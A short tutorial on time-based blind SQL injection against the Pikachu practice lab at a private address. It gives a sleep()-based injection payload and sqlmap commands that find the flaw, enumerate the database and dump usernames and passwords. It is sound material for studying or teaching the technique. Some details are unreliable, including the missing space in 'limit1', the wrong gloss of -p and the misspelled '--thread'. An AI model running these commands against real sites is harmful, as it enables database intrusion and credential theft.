time injection
Utilization principle
Mainly used functions
sleep()
substring()
if()
example:
1' and if(substring((select * from students limit1),1,1)='a',sleep(5),0)
#当条件满足时,进行睡眠
Injection using sqlmap
1. Query whether there is time injection
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --dbms mysql
2. Get the database name
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --dbms mysql --current-user --current-db --batch
-p:
Specified detection method
-u:
Specify url
-v:
to display debug mode
--dbms:
Specify database
--technique=T:
Use time injection method
--current-user:
to get current user
--current-db:
Get current database
--batch:
Use the default mode to automatically be y
3. Get the table name
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --tables -D pikachu --batch
-D:
Specify the database name
--tables:
to get all the tables
4. Get the field name
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --columns -D pikachu -T users --batch
-T:
Specify the table name
--columns:
to get all the fields
5. Obtain account password
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T -D pikachu -T users -C 'username,password' --dump --batch --thread 10
--dump:
-C:
Specify the field
--threads:
to specify the number of threads